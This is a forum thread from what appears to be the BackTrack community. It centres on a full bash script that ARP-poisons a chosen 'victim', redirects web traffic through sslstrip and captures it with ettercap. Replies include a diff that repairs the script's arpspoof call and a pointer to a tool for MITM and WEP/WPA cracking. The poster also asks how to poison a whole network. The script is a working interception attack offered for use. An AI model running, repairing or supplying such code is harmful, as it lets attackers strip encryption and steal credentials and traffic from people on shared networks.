Results 1 to 5 of 5

Thread: SSl Sniff Script Repair

  1. #1
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default SSl Sniff Script Repair

    Found the following script. Have been unable to get it to run.
    The error seems to be with the Arpspoof area.

    Should I replace it with Ettercap, or well...what do you guys think?

    Also, it is unclear how to ARP the entire network. I put in // // for target and the router IP for gateway. not sure if that would work being that the arp spoof fails.

    I would appreciate any feedback.

    Code:
    #!/bin/bash
    #
    # Synopsis:	A program to sniff traffic in an SSL connection
    # Author:		thims (thims DOT local AT gmail DOT com)
    # Version:	0.3
    # Date:			20091107
    # Comments:	
    #		ToDO:
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    etterConf=/etc/etter.conf
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -i. --iface    -  Interface to use
        -e, --etconf   -  Location of etter.conf on the filesystem
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
    	if [ -n "$1" ] ;then
    		echo "$1"
    	fi
    	exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
    	cmd="$1"
    	nohup $cmd > /dev/null &> /dev/null &
    	sleep 5
    	# here simply to handle sslstrip because it is ran by python it throws off pidof
    	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    	else
    		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    	fi
    
    	if [ -z "$pid" ] ;then
    		return 1
    	else
    		return 0
    	fi
    }
    
    # poison the arp
    function spoofMac() {
    	echo -n "Poisoning the victim...."
    	noHup "arpspoof "$iface" -t "$victim" "$gateway""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate arpspoof. Dieing..."
    	fi
    	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
    	echo -n "Setting up SSL intercept...."
    	echo 1 > /proc/sys/net/ipv4/ip_forward
    	# ensure that ip_forward is set
    	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
    	do
    		echo 1 > /proc/sys/net/ipv4/ip_forward
    	done
    
    	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    	noHup "sslstrip -a -f -k -l "$sslPort""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate sslstrip. Dieing..."
    	fi
    	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    }
    
    # capture the responses
    function capture() {
    	# edit ettercap.conf
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/#//' "$etterConf"
    	done
    
    	echo -n "Starting to sniff...."
    	ettercap -T -q "$iface"
    }
    
    # clean up enviroment
    function cleanUp() {
    	echo "Cleaning up...."
    	echo -n "Closing SSL proxy...."
    	kill $(cat /var/run/sslsniff.sslstrip.run)
    	rm /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    	echo -n "Unpoisoning the victim...."
    	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    	rm /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    	echo -n "Removing iptables rule and ip_forwarding...."
    	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
    	echo 0 > /proc/sys/net/ipv4/ip_forward
    	echo "Ok"
    	
    	# return etter.conf to the state it was found in 
    	echo -n "Returning etter.conf to the configuration we found it with...."
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/^/#/' "$etterConf"
    	done
    	echo "Ok"
    	echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
    	else
    		echo "Enviroment details:"
    		echo "    Victim:         " "$victim" "  Ok!"
    		echo "    Gateway/Router: " "$gateway" "  OK!"
    		echo "    Interface:      " "$iface" "  OK!"
    		echo "    SSLStrip port:  "	"$sslPort" "  OK!"
    
        spoofMac
        sslInit
        capture
    		cleanUp
      fi  
    }
    
    
    # some CLI ARGS?
    while [ $# -gt 0 ]
    do
    	case "$1" in
    		"-h"|"--help")
    			help
    			die
    		;;
    		"-v"|"--victim")
    			victim="$2"
    		;;
    		"-g"|"--gw")
    			gateway="$2"
    		;;
    		"-s"|"--sslport")
    			sslPort="$2"
    		;;
    		"-i"|"--iface")
    			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
    				die "Error: interface "$2" does not exist!"
    			else
    				iface="-i $2"
    			fi
    		;;
    		"-e"|"--etconf")
    			if [ ! -e "$2" ] ;then
    				die "Error: specified ettercap conf does not exist!"
    			else
    				etterConf="$2"
    			fi
    		;;
    		'')
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    		-*)
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    	esac
    	shift
    done
    
    
    # main loop
    initialize

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: SSl Sniff Script Repair

    Where did you find this script at?
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Just burned his ISO ewiget's Avatar
    Join Date
    Mar 2007
    Posts
    16

    Default Re: SSl Sniff Script Repair

    There are more errors in this script that just the arpspoof section, but this will get you past that

    Code:
    --- sslsniffer.sh.orig  2011-05-12 00:09:29.123538197 -0400
    +++ sslsniffer.sh       2011-05-12 00:10:37.273557277 -0400
    @@ -7,6 +7,7 @@
     # Comments:
     #              ToDO:
     
    +set -x
     
     # leave blank simply here for coding style
     victim=
    @@ -57,7 +58,7 @@
     # poison the arp
     function spoofMac() {
            echo -n "Poisoning the victim...."
    -       noHup "arpspoof "$iface" -t "$victim" "$gateway""
    +       noHup "arpspoof -i "$iface" -t "$victim" "$gateway""
            if [ $? -gt 0 ] ;then
                    die "Error: could not initiate arpspoof. Dieing..."
            fi
    @@ -164,7 +165,7 @@
                            if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
                                    die "Error: interface "$2" does not exist!"
                            else
    -                               iface="-i $2"
    +                               iface="$2"
                            fi
                    ;;
                    "-e"|"--etconf")
    Ed Wiget
    "Job security -- feeding the gates empire!"

  4. #4
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Default Re: SSl Sniff Script Repair

    Archangel, I found the script in these forums (i think). I thought I made a reference but apparently not.

  5. #5
    Just burned his ISO Ro0t_'s Avatar
    Join Date
    Jun 2009
    Posts
    18

    Default Re: SSl Sniff Script Repair

    You can try a script called WiPhire which works perfectly, it has an option for MITM using SSLStrip as well as a few others like crack WPA and WEP. I'm not sure if it runs on BT5 but you can give it a shot or just use it to check out the code. It's way easier than typing all the lines in especially when you already know them and their meanings.
    http://sourceforge.net/projects/wiphire/
    "It's Mind over Matter, if you don't have a mind it doesn't matter"

Similar Threads

  1. Ssl Sniff Script
    By iLoad in forum Tutorials und Howtos
    Replies: 1
    Last Post: 04-08-2010, 03:03 PM
  2. Repair Dynamic Disks
    By Dissident85 in forum OLD General IT Discussion
    Replies: 5
    Last Post: 09-12-2008, 12:34 AM
  3. Want to repair PCs in Texas? Get a PI License.
    By thorin in forum OLD General IT Discussion
    Replies: 20
    Last Post: 07-03-2008, 08:16 AM
  4. For anyone looking for IT work/experience or wanting cheaper repair!
    By 0tt0v0nc4t in forum OLD General IT Discussion
    Replies: 3
    Last Post: 04-16-2008, 03:48 PM
  5. Leo Repair is it possible?
    By l0gaN in forum OLD Newbie Area
    Replies: 1
    Last Post: 10-02-2007, 03:28 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •